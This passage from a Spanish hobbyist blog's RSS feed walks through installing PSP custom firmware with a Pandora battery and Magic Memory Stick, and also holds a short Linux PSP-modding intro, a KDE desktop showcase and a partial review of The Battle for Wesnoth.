href="http://beta.pesepe.com/biblioarchivosdrupal/fm_publicos/active/12/instalaripl.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; width: 320px; cursor: pointer; text-align: center;" alt="" src="http://beta.pesepe.com/biblioarchivosdrupal/fm_publicos/active/12/instalaripl.png" border="0" /&gt;&lt;/a&gt;&lt;/div&gt; &lt;p&gt;&lt;b&gt;Pulsamos X&lt;/b&gt;.&lt;/p&gt; &lt;p&gt;En este preciso momento &lt;b&gt;podemos hacer una copia de seguridad de la Memory Stick&lt;/b&gt;, por si quereis utilizar estos archivos en el futuro. &lt;/p&gt; &lt;p&gt;Si teneis la bateria Pandora creada, salimos del UltraPandora Installer. Si la teneis que crear, seguid leyendo. &lt;/p&gt; &lt;h3&gt;Creando la Pandora's Battery&lt;/h3&gt; &lt;h5&gt;Este paso nos lo podemos saltar si ya disponemos de una bateria preparada como Pandora. De lo contrario: &lt;/h5&gt; &lt;p&gt;Ejecutamos en la PSP desde el menu Juegos la aplicación "&lt;b&gt;UltraPandora Installer&lt;/b&gt;". Vamos al &lt;b&gt;icono de la bateria&lt;/b&gt;, y dentro de este:&lt;/p&gt; &lt;div style="text-align: center;"&gt;&lt;p style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://beta.pesepe.com/biblioarchivosdrupal/fm_publicos/active/12/bateriapandora.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; width: 320px; cursor: pointer; text-align: center;" alt="" src="http://beta.pesepe.com/biblioarchivosdrupal/fm_publicos/active/12/bateriapandora.png" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;/div&gt; &lt;p&gt;&lt;b&gt;Pulsamos X para pandorizar la bateria&lt;/b&gt;. Vamos a la derecha del todo del menu para salir. &lt;/p&gt; &lt;p&gt;Llegados a este punto, ya tendremos nuestra "&lt;b&gt;Magic Memory Stick&lt;/b&gt;" y una "&lt;b&gt;JigKick Battery&lt;/b&gt;".&lt;/p&gt; &lt;p&gt;Os recordamos que si habeis modificado la bateria de una PSP "normal", os sirve para introducirla en una PSP "normal" o Slim. &lt;u&gt;Si habeis modificado la bateria de una PSP Slim, solo podreis introducirla en una PSP Slim&lt;/u&gt;. &lt;/p&gt; &lt;h2&gt;Modo de empleo (si ya teneis la bateria y la Memory Stick "magicas")&lt;br /&gt;&lt;/h2&gt; &lt;ol&gt;&lt;li&gt;Metemos la Memory Stick "magica" en la PSP brickeada, o que va a ser hackeada.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Con el cable de corriente desconectado&lt;/b&gt;, mete la "&lt;b&gt;JigKick Battery&lt;/b&gt;" (bateria modificada),&lt;b&gt; la PSP deberia encender SOLA&lt;/b&gt;.&lt;/li&gt;&lt;li&gt;Aparece un menu, seguimos las instrucciones de pantalla. &lt;ol&gt;&lt;li&gt;&lt;b&gt;Press X to install 3.71 M33-2&lt;/b&gt; =&gt; Pulsando X se nos instalaré el Custom Firmware M33 en cualquier PSP (Slim o Fat).&lt;/li&gt;&lt;li&gt;&lt;b&gt;Press O to instal original 3.71&lt;/b&gt; =&gt; Pulsando O se nos instalará el Firmware original 3.71.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Press [ ] to dump the nand&lt;/b&gt; =&gt; Esto nos dumpeará nuestra memoria Flash a la Memory Stick en forma de copia EXACTA.&lt;/li&gt;&lt;li&gt;&lt;b&gt;***Press L+R+start+home to restore nand dump (dangerous!)&lt;/b&gt; = &gt; Esto nos restaurará nuestra memoria Flash (previamente dumpeada) &lt;u&gt;&lt;b&gt;Peligroso!&lt;/b&gt;&lt;/u&gt; (nota detallada más abajo sobre los peligros de esta opción).&lt;/li&gt;&lt;/ol&gt;&lt;/li&gt;&lt;li&gt;Simplemente, &lt;b&gt;pulsamos X&lt;/b&gt; y podremos ver que los leds de Wifi y Memory Stick empiezan a parpadear.&lt;/li&gt;&lt;li&gt;Cómo saber si el proceso ha finalizado: &lt;ul&gt;&lt;li&gt;Bastará con fijarse en la pantalla y esperar a que salga el mensaje de Reiniciar la PSP. Metemos la bateria y la Stick "normales" y la reiniciamos.&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Proceso Finalizado&lt;/b&gt;: Bienvenidos al mundo de la Scene y del Homebrew... de nuevo ;).&lt;/li&gt;&lt;/ol&gt; &lt;p&gt;&lt;b&gt;Nota&lt;/b&gt; importante de &lt;b&gt;Dark_AleX&lt;/b&gt; sobre utilizar el dumpeo de la Flash:&lt;/p&gt; &lt;p&gt;&lt;i&gt;***&lt;/i&gt;&lt;i&gt;OJO: este proceso es peligroso y solo debe hacerse en caso de extrema emergencia si ninguna otra cosa funciona, y SOLAMENTE usando un dump previamente dumpeado de tu PSP, no uses el DUMP de otra PSP. Al contrario que el restaurador de nand de Pandora, que era un restaurador lógico, este restaurador es físico: intentará hacer un clon 100% exacto del dump. Si el dump de la psp no es tuyo, tendrás un brick o una psp con idstorage corrupto, dependiendo del firmware. Si en el momento de la restauración, tu psp tiene algun bloque dañado más que en el momento del dumpeo, también podrías tener un brick, dependiendo de que bloque se haya dañado. Es por eso que este método solo se aconseja en casos de emergencia o cuando utilizes dumps que has hecho más o menos recientemente.&lt;/i&gt;"&lt;/p&gt; &lt;p&gt;&lt;b&gt;Tras pulsar X y finalizar el proceso estareis en 3.71 M33 con posibilidad de carga de ISOS y carga limitada de Homebrew&lt;/b&gt;, os recomendamos encarecidamente &lt;b&gt;instalar el ultimo &lt;a href="http://beta.pesepe.com/story/custom-firmware-m33"&gt;Parche kernel 1.50 &lt;/a&gt;&lt;/b&gt;&lt;a href="http://beta.pesepe.com/story/custom-firmware-m33"&gt;(solo para PSP "normal") &lt;/a&gt;&lt;b&gt;&lt;a href="http://beta.pesepe.com/story/custom-firmware-m33"&gt;y el Update 3.71 M33-3&lt;/a&gt;&lt;/b&gt; para cargar Homebrew al 100% . &lt;/p&gt; &lt;p&gt;&lt;b&gt;Esta misma bateria, y esta misma Memory Stick, nos sirven para realizar el proceso en cuantas PSP's queramos&lt;/b&gt; (siempre y cuando, lógicamente, no formateemos la Stick, ni devolvamos la bateria a su estado "normal"). &lt;b&gt;Tendremos una PSP con el Custom Firmware 3.71-2&lt;/b&gt;.&lt;/p&gt; &lt;h3&gt;&lt;u&gt;&lt;b&gt;Cuando ya tengais el proceso acabado y la PSP funcional, os recomendamos ENCARECIDAMENTE hacer una copia EXACTA de la NAND de vuestra PSP, usando la opcion &lt;/b&gt;&lt;b&gt;Cuadrado del &lt;/b&gt;&lt;b&gt;menu del Despertar del Cementerio (&lt;/b&gt;&lt;b&gt;Press [ ] to dump the nand). Se os creara un archivo en la Stick llamado "&lt;i&gt;nand-dump.bin&lt;/i&gt;" que debeis GUARDAR BIEN en vuestro PC, por si lo necesitais en el futuro (sirve para reparar TODOS los bricks por software, pero este archivo sirve SOLO para vuestra PSP, de ahi que sea tan importante hacer una copia propia). &lt;/b&gt;&lt;/u&gt;&lt;/h3&gt; &lt;h5&gt;Posibles fallos&lt;/h5&gt; &lt;ul&gt;&lt;li&gt;&lt;h5&gt;Si al meter la Stick y la bateria Magicas se enciende el LED de Power pero no aparece nada en pantalla, asegurate de que estas usando una Stick de tamaño adecuado. Si es asi, repite el proceso despacio (metiendo primero la Stick, y luego la bateria, siempre con el cargador desenchufado). Si vuelve a pasarte lo mismo, prueba con otra Stick. &lt;/h5&gt;&lt;/li&gt;&lt;li&gt;&lt;h5&gt;Si la PSP muestra el logo de Sony, y despues no aparecen los iconos, o la PSP se bloquea/reinicia tras arrancar, formatead la Flash1: Entra en el modo recovery (manteniendo pulsado R al encender la PSP) al arrancar la consola, vete a advanced y format flash 1, con esto a mi me ha funcionado. &lt;/h5&gt;&lt;/li&gt;&lt;li&gt;&lt;h5&gt;Si vuelve otra vez a aparecer el menu del Despertar del Cementerio, mete una Stick "normal" (no magica) y una bateria "standard" (no Pandora)&lt;/h5&gt;&lt;/li&gt;&lt;li&gt;&lt;h5&gt;Si al final del proceso aparecen errores del tipo: "ERROR WHILE INITIALIZING: 0x8ca10002" o simplemente no aparece nada en pantalla al meter la bateria y la Stick magicas, comprobad que estais usando una Stick compatible (ver inicio del tutorial) y repetid de nuevo el proceso.&lt;/h5&gt;&lt;/li&gt;&lt;/ul&gt; &lt;h2&gt;Si quieres que tu bateria y tu Memory Stick sea de nuevo utilizable (paso opcional)&lt;/h2&gt; &lt;p&gt;La bateria la podeis guardar asi, tal cual, para realizar otros Downgrades / Unbricks. Pero alguno querra que siga siendo una bateria normal y corriente. Tendreis que hacer lo siguiente.&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;h3&gt;Regresar la bateria a su modo habitual (no Pandora) &lt;/h3&gt;&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Encendemos la PSP sin bateria y sin Memory Stick (enchufamos, logicamente, el cable de corriente). Estando en el XMB, ponemos la bateria Pandora y la Memory Stick. Desde el menu Juegos, ejecutamos el "&lt;b&gt;UltraPandora Installer&lt;/b&gt;". Vamos al &lt;b&gt;icono de la bateria&lt;/b&gt;, y dentro de este:&lt;/p&gt; &lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://beta.pesepe.com/biblioarchivosdrupal/fm_publicos/active/12/normalizarbateria.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; width: 320px; cursor: pointer; text-align: center;" alt="" src="http://beta.pesepe.com/biblioarchivosdrupal/fm_publicos/active/12/normalizarbateria.png" border="0" /&gt;&lt;/a&gt;&lt;/div&gt; &lt;p&gt;Pulsamos &lt;b&gt;X&lt;/b&gt;. &lt;/p&gt; &lt;p&gt;&lt;u&gt;&lt;b&gt;Nota de carga de bateria Pandora&lt;/b&gt;&lt;/u&gt;: Para cargar la bateria Pandora, encendemos la PSP SIN bateria y con el cargador enchufado, metemos la bateria Pandora estando en el XMB, y esperamos a que se cargue. &lt;/p&gt; &lt;p&gt;Para recuperar la Memory Stick basta con que la formateeis desde la PSP, aunque &lt;b&gt;la podeis usar con normalidad si la Bateria no es Pandora&lt;/b&gt;.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;De momento es todo chavales, este tutorial fue sacado de la comunidad de Beta Pesepe con algunas adaptaciones, así que no se quejen, garantizado que anda en Linux xD</description><link>http://okltsmash.blogspot.com/2008/01/cambiando-el-firmware-de-nuestra-psp.html</link><author>noreply@blogger.com (LTSmash)</author><thr:total>34</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1939403793017189152.post-136788990024808804</guid><pubDate>Tue, 22 Jan 2008 23:32:00 +0000</pubDate><atom:updated>2008-01-22T17:40:47.473-06:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">hacking psp linux</category><title>PSP Hacking bajo GNU/Linux</title><description>Tal vez algunos vieron el antiguo manual para hackear su PSP.&lt;br /&gt;&lt;br /&gt;Bien, ES OBSOLETO, Y ESTÁ MUY MALTRECHO (xD)...&lt;br /&gt;&lt;br /&gt;Así que, ahora voy a tener la bondad de ayudarles a hacer modding de su PSP bajo Linux :p&lt;br /&gt;&lt;br /&gt;Para empezar, un tutorial para cambiar el firmware de su PSP (tanto Slim como FAT) de el oficial de Sony a un Custom Firmware.&lt;br /&gt;&lt;br /&gt;A darle tios xD</description><link>http://okltsmash.blogspot.com/2008/01/psp-hacking-bajo-gnulinux.html</link><author>noreply@blogger.com (LTSmash)</author><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1939403793017189152.post-1687750791757153702</guid><pubDate>Mon, 14 Jan 2008 23:56:00 +0000</pubDate><atom:updated>2008-01-14T18:04:01.261-06:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">kde desktop screenshots</category><title>Finalizado mi desktop</title><description>Para terminarlos de marear con la misma pijada, he aqui el "Release Candidate #1" de mi desktop KDE (y no, yo no hice NINGUN PUTO DESKTOP ENVIRNMENT, KDE NO ES DE MI AUTORIA YO SOLO ESTOY PRESENTANDOLES MI ESCRITORIO, ¿VALE?)&lt;br /&gt;&lt;br /&gt;Ya para que paren de joder, les dejo los links xD&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://descargas.ltsmash.org/screens/darch3/darch3-desktop.png"&gt;Fondo/Wallpaper&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://descargas.ltsmash.org/screens/darch3/darch3-menuk.png"&gt;Menu K&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://descargas.ltsmash.org/screens/darch3/darch3-firefox.png"&gt;Navegador Web&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://descargas.ltsmash.org/screens/darch3/darch3-compiz.png"&gt;Cubo de Escritorio&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;PD: No es GNOME, es KDE&lt;br /&gt;PPD: Si quieren les paso el tema xD</description><link>http://okltsmash.blogspot.com/2008/01/finalizado-mi-desktop.html</link><author>noreply@blogger.com (LTSmash)</author><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1939403793017189152.post-6982813083413773809</guid><pubDate>Sun, 06 Jan 2008 18:20:00 +0000</pubDate><atom:updated>2008-01-06T12:56:51.472-06:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">battle for wesnoth juegos gnu linux</category><title>[JUEGO] The Battle For Wesnoth</title><description>&lt;span class="msnoticia"&gt;&lt;p&gt;Si partimos de la más que probada base de que la palabra gratis provoca un aumento de la atención en el lector, entonces entender el porqué de este análisis. Siendo posiblemente la palabra más buscada en todos los motores de búsqueda que coexisten en nuestra superpoblada red de redes, donde no siempre conseguimos los resultados deseados introduciendo ésta casi mágica unión de vocales y consonantes... pero cuando se obtiene resultado, en ese momento, sabemos que ha valido la pena la búsqueda. El producto de esta profunda búsqueda fue, en esta ocasión, un sencillo título que lleva por homólogo el nombre de The Battle for Wesnoth, un genial juego con licencia libre GNU GPL. Vamos a echarle un vistazo... ¿os parece?.&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;table wbid="cw460103eb895ec" align="center" border="0" cellpadding="0" cellspacing="2" width="380"&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td&gt;&lt;a href="javascript:imagenMML%20('cw460103eb895ec');"&gt;&lt;img alt="The Battle for Wesnoth (PC)" src="http://plataforma.meristation.com/EPORTAL_IMGS/GENERAL/juegos/PC-Estrategia/b6/IMG-cw460103eb895ec/wesnoth17pe.jpg" wbid="cw460103eb895ec" link="true" align="middle" border="0" height="285" width="380" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt; &lt;td class="fecha" id="footer" align="center"&gt;The Battle for Wesnoth&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;Ideado originalmente por David White en verano de 2003, The Battle for Wesnoth surgió como un intento de crear un juego de estrategia por turnos sencillo, del estilo de Master of Monsters o Warsong, de aquella Sega Génesis que muchos aún recordarán y otros pocos conservarán. &lt;p&gt; &lt;/p&gt;&lt;table wbid="cw4601036309e2f" align="right" border="0" cellpadding="0" cellspacing="2" width="150"&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td&gt;&lt;a href="javascript:imagenMML%20('cw4601036309e2f');"&gt;&lt;img alt="The Battle for Wesnoth (PC)" src="http://plataforma.meristation.com/EPORTAL_IMGS/GENERAL/juegos/PC-Estrategia/b6/IMG-cw4601036309e2f/wesnoth16pe.jpg" wbid="cw4601036309e2f" link="true" align="right" border="0" height="115" width="150" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt; &lt;td class="fecha" id="footer" align="center"&gt;The Battle for Wesnoth&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;Implementado con reglas muy sencillas pero con una potente inteligencia artificial, la comunidad adepta al software libre no tardó en ver las posibilidades de tan discretamente ambicioso proyecto, y poco a poco, más y más desarrolladores se fueron uniendo para crear el mundo de Wesnoth. Sería finalmente en 2005 cuando la primera versión realmente finalizada del juego vería la luz, para deleite de jugones de todos los rincones del planeta... porque, señoras y señores lectores, The Battle for Wesnoth ha sido traducido, ni más ni menos, que a la nada desdeñable cantidad de 35 idiomas, parcialmente en muchos casos, pero no será por falta de intención. Otra vez más, el software libre demostró que con muchos menos medios se podía llegar a un trabajo superior, en muchos casos, al de algunos de los productos que encontramos en las tiendas, al menos, lingüísticamente hablando. &lt;p&gt;No contentos con la que ya habían liado, los participantes del proyecto Wesnoth siguieron y siguen hoy en día actualizando, modificando y engrosando la lista de capacidades y virtudes que nos ofrece lo que al ahora líder del proyecto, David White, le parecía en aquel lejano 2003 un intento de emular aquellos juegos que posiblemente tanto le gustaron en su momento. &lt;/p&gt; &lt;p&gt; &lt;/p&gt;&lt;table wbid="cw4601036303801" align="right" border="0" cellpadding="0" cellspacing="2" width="150"&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td&gt;&lt;a href="javascript:imagenMML%20('cw4601036303801');"&gt;&lt;img alt="The Battle for Wesnoth (PC)" src="http://plataforma.meristation.com/EPORTAL_IMGS/GENERAL/juegos/PC-Estrategia/b6/IMG-cw4601036303801/wesnoth15pe.jpg" wbid="cw4601036303801" link="true" align="right" border="0" height="113" width="150" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt; &lt;td class="fecha" id="footer" align="center"&gt;The Battle for Wesnoth&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt; &lt;p&gt;Historia universal aparte, vamos a lo que realmente interesa... el juego. Podríamos definir The Battle for Wesnoth como un juego de estrategia por turnos con toques de rol, y haciendo honor a la simplicidad que predican los diseñadores, no extenderemos más esta definición.&lt;/p&gt; &lt;p&gt;Ambientado en el fantástico mundo de, como habréis adivinado, Wesnoth, se nos propone dirigir a uno de los bandos en un amplio número de campañas originalmente diseñadas o incluso un sin fin de batallas individuales. Para lo que ya no se imaginan como era esto cuando lo de jugar contra cualquiera, desde tu propia casa, aún sonaba a ciencia ficción, se nos ofrece la posibilidad de combatir por Wesnoth en un atractivo modo multijugador con partidas de hasta 9 jugadores, e incluso partidas multijugador en el mismo ordenador. &lt;/p&gt; &lt;p&gt; &lt;/p&gt;&lt;table wbid="cw46010362f2003" align="right" border="0" cellpadding="0" cellspacing="2" width="150"&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td&gt;&lt;a href="javascript:imagenMML%20('cw46010362f2003');"&gt;&lt;img alt="The Battle for Wesnoth (PC)" src="http://plataforma.meristation.com/EPORTAL_IMGS/GENERAL/juegos/PC-Estrategia/b6/IMG-cw46010362f2003/wesnoth13pe.jpg" wbid="cw46010362f2003" link="true" align="right" border="0" height="116" width="150" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt; &lt;td class="fecha" id="footer" align="center"&gt;The Battle for Wesnoth&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;Desde luego que las alternativas no son pocas, y, ni mucho menos, aburridas. Como tendremos a nuestra elección 6 bandos, y ninguno nos hemos criado en tierras de Wesnoth, se hace necesario que pasemos lista. Antes de nada, diremos que cada bando cuenta con diferentes tipos de tropas, cada una de las cuales utiliza diferentes armas para los distintos tipos de ataque, léase cuerpo a cuerpo, a distancia o mágico. Cada tropa sigue un árbol de mejoras en el que podremos avanzar cuando subamos de nivel con alguna de ellas, y, por supuesto, las tropas supervivientes, como se dice de los que huyen, estarán disponibles para la próxima batalla.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="msnoticia"&gt;&lt;p&gt;El primero de ellos es el bando de los Rebeldes, pero sin analogía alguna con sus homólogos de las Galaxias, ya que se trata en su mayoría de elfos que reclaman para su señor Konrad el trono que ahora ostenta la malvada reina Asheviere. Las tropas élficas son algo más rápidas de lo normal, especialmente precisas con el arco y muy peligrosas en las zonas boscosas. La Alianza Knalgan se compone de tropas enanas, algo más lentas pero fieras en el combate a cuerpo y expertas en el movimiento por las cavernas y montañas. &lt;/p&gt; &lt;p&gt; &lt;/p&gt;&lt;table wbid="cw460103eba8ff7" align="center" border="0" cellpadding="0" cellspacing="2" width="380"&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td&gt;&lt;a href="javascript:imagenMML%20('cw460103eba8ff7');"&gt;&lt;img alt="The Battle for Wesnoth (PC)" src="http://plataforma.meristation.com/EPORTAL_IMGS/GENERAL/juegos/PC-Estrategia/b6/IMG-cw460103eba8ff7/wesnoth02pe.jpg" wbid="cw460103eba8ff7" link="true" align="middle" border="0" height="285" width="380" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt; &lt;td class="fecha" id="footer" align="center"&gt;The Battle for Wesnoth&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;El siguiente bando, los Legitimistas, son los seguidores incondicionales de la reina Asheviere, y por lo tanto, acérrimos enemigos de los Rebeldes. Sus puntos fuertes son su infantería y su poderosa caballería, que los hace ciertamente temibles en las zonas despejadas y a la luz del día. Los Norteños agrupan a orcos, trolls y goblins, su arma principal es la fuerza bruta de la que hacen gala, además de su reducido coste de reclutamiento. Algunos son verdaderamente eficaces atajando por las colinas, y son mucho mejores cuando batallan acogidos bajo el manto de la oscura noche. &lt;p&gt; &lt;/p&gt;&lt;table wbid="cw46010362ed972" align="right" border="0" cellpadding="0" cellspacing="2" width="150"&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td&gt;&lt;a href="javascript:imagenMML%20('cw46010362ed972');"&gt;&lt;img alt="The Battle for Wesnoth (PC)" src="http://plataforma.meristation.com/EPORTAL_IMGS/GENERAL/juegos/PC-Estrategia/b6/IMG-cw46010362ed972/wesnoth12pe.jpg" wbid="cw46010362ed972" link="true" align="right" border="0" height="103" width="150" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt; &lt;td class="fecha" id="footer" align="center"&gt;The Battle for Wesnoth&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;El bando de los No Muertos, se compone, como no podía ser de otra manera, de esqueletos, zombies y almas en pena cuya resistencia física es considerable, pero muy débiles antes los ataques mágicos, y muchas veces basan su estrategia en la superioridad numérica que le otorgan las hordas de zombies. El último, pero no por ello menos importante, de los bandos, son los Drakos, tropas de aspecto draconiano que luchan eficazmente durante el día, y donde muchos de sus miembros son capaces de volar y echar fuego por la boca. &lt;p&gt;&lt;strong&gt;Gráficos&lt;/strong&gt;&lt;br /&gt;Quien espere unos espectaculares gráficos tridimensionales con multitud de texturas perfectamente utilizadas tiene dos opciones, darle una oportunidad al juego o huir de Wesnoth antes de que los Drakos le alcancen. Por si no estaba claro, los gráficos siguen la misma idea que todo el juego, sencillez. Pero no nos confundamos, sencillez no significa, gráficos penosos, al menos así no sale en mi diccionario, ni que tengamos que poner una parte de interés y tres de imaginación para descifrar lo que ocurre en el juego. Wesnoth usa un modo gráfico plano bidimensional, muy atractivo para la vista, lleno de colorido como no podría ser menos en una tierra tan fantástica. &lt;/p&gt; &lt;p&gt; &lt;/p&gt;&lt;table wbid="cw46010363452ad" align="right" border="0" cellpadding="0" cellspacing="2" width="150"&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td&gt;&lt;a href="javascript:imagenMML%20('cw46010363452ad');"&gt;&lt;img alt="The Battle for Wesnoth (PC)" src="http://plataforma.meristation.com/EPORTAL_IMGS/GENERAL/juegos/PC-Estrategia/b6/IMG-cw46010363452ad/wesnoth07pe.jpg" wbid="cw46010363452ad" link="true" align="right" border="0" height="113" width="150" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt; &lt;td class="fecha" id="footer" align="center"&gt;The Battle for Wesnoth&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;El escenario de batalla lo encontraremos dividido en esos hexágonos tan típicos de los wargames tradicionales y de los panales de las abejas. En cada uno de esos hexágonos una unidad, y sólo una, podrá ser ubicada. Así pues el movimiento por turno de cada unidad depende del número de hexágonos que pueda moverse, pero se verá reducido o aumentado por otras causas, sobre todo el terreno y la hora del día, porque en Wesnoth amanece y anochece, que no es poco. Cada zona del mapa, cada hexágono en concreto, representa fielmente el tipo de terreno en el que se encuentra, de una manera inconfundible y muy correcta. &lt;p&gt;Las tropas sólo podrán enfrentarse contra aquellas que se encuentren en un hexágono adyacente, y atacarán tantas veces como su atributo de número de ataques nos permita. En un combate los atacantes lideran la iniciativa, pero los defensores no se quedan quietos recibiendo de lo lindo, si no que responden con un ataque que sea del mismo tipo que el usado. &lt;/p&gt; &lt;p&gt; &lt;/p&gt;&lt;table wbid="cw46010362e48ad" align="right" border="0" cellpadding="0" cellspacing="2" width="150"&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td&gt;&lt;a href="javascript:imagenMML%20('cw46010362e48ad');"&gt;&lt;img alt="The Battle for Wesnoth (PC)" src="http://plataforma.meristation.com/EPORTAL_IMGS/GENERAL/juegos/PC-Estrategia/b6/IMG-cw46010362e48ad/wesnoth11pe.jpg" wbid="cw46010362e48ad" link="true" align="right" border="0" height="113" width="150" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt; &lt;td class="fecha" id="footer" align="center"&gt;The Battle for Wesnoth&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;Es decir, si atacamos cuerpo a cuerpo y el defensor tiene ataques cuerpo a cuerpo, nos responderá. Si atacamos con un hechizo y el defensor no sabe hechizos, nos iremos de rositas. Ese es el tema. Por lo tanto se hace imprescindible para el buen general calcular el número de ataques que va a realizar y el daño aproximado que puede producir, además del número de ataques y daño que va a recibir como respuesta. &lt;p&gt;Poco a poco el jugador irá descubriendo que tropas hacen frente mejor a que enemigos, pero eso, lo proporciona la experiencia. A propósito de las tropas, decir que las representaciones gráficas de cada una, aunque casi inanimadas, son realmente vistosas. No sólo eso, si no que cada avance o mejora de tropa tiene su propia representación, de manera que se nos hará más fácil distinguirlas en la confrontación, tanto a nuestras tropas como a las del enemigo. Como cada tropa tiene un nombre propio, hasta nos podremos encariñar con algunos de nuestros leales servidor.&lt;/p&gt;&lt;/span&gt;&lt;span class="msnoticia"&gt;&lt;p&gt;El interfaz de usuario no podría ser más sencillo, y familiarizarse con el mismo no llevará más tiempo que el que duran dos vistazos. Hablaremos más adelante de sus características de jugabilidad, pero podemos adelantar sin riesgos que, como todo en el juego, no por ser simple es menos bonito. Incluso hay algunas pantallas de introducción que son, en su mayoría, mapas en el que se nos muestra nuestro avance en Wesnoth en los modos de campaña. Sin embargo, los mapas son dignos de cualquier novela de aventuras. &lt;/p&gt; &lt;p&gt; &lt;/p&gt;&lt;table wbid="cw460103eb9d7a3" align="center" border="0" cellpadding="0" cellspacing="2" width="380"&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td&gt;&lt;a href="javascript:imagenMML%20('cw460103eb9d7a3');"&gt;&lt;img alt="The Battle for Wesnoth (PC)" src="http://plataforma.meristation.com/EPORTAL_IMGS/GENERAL/juegos/PC-Estrategia/b6/IMG-cw460103eb9d7a3/wesnoth01pe.jpg" wbid="cw460103eb9d7a3" link="true" align="middle" border="0" height="285" width="380" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt; &lt;td class="fecha" id="footer" align="center"&gt;The Battle for Wesnoth&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;Mirar el juego desde el punto de vista gráfico y proponer alguna mejora que no afecte en ningún término a la sencillez del juego es tan complicado que no sería de extrañar que la versión gráfica se mantuviera en futuras versiones. Por supuesto que el juego sería muchísimo más atractivo usando motores gráficos de última generación, pero lo que no podríamos asegurar es si el resultado general sería tan positivo como el que actualmente está implementado. &lt;p&gt;&lt;strong&gt;Sonido&lt;/strong&gt;&lt;br /&gt;&lt;/p&gt;&lt;table wbid="cw460103633c8d5" align="right" border="0" cellpadding="0" cellspacing="2" width="150"&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td&gt;&lt;a href="javascript:imagenMML%20('cw460103633c8d5');"&gt;&lt;img alt="The Battle for Wesnoth (PC)" src="http://plataforma.meristation.com/EPORTAL_IMGS/GENERAL/juegos/PC-Estrategia/b6/IMG-cw460103633c8d5/wesnoth06pe.jpg" wbid="cw460103633c8d5" link="true" align="right" border="0" height="113" width="150" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt; &lt;td class="fecha" id="footer" align="center"&gt;The Battle for Wesnoth.&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;Musicalmente hablando, Wesnoth nos recibirá con una épica marcha de batalla, acertada primera impresión. Y las siguientes no serán menos acertadas. La banda sonora es digna de competir con muchos de los juegos comerciales, melodías correctamente elegidas para cada situación del juego o campaña nos acompañarán durante nuestras confrontaciones. &lt;p&gt;¿Un fallo en este punto?, aquel del que tantos y tantos títulos pecan, al final se nos hará repetitiva. Tendremos tiempo suficiente hasta que nos aceche esta sensación de "déjà vu" o paramnesia melódica, así que sigamos con un repaso de las cualidades, en el campo del sonido, del título. &lt;/p&gt; &lt;p&gt;Los efectos de combate son variados, y bastante acordes con cada tipo de ataque realizado, sin dejar de ser los tradicionales sonidos de choque de espadas, lanzamiento de flecha o relámpago mágico. Sin embargo, 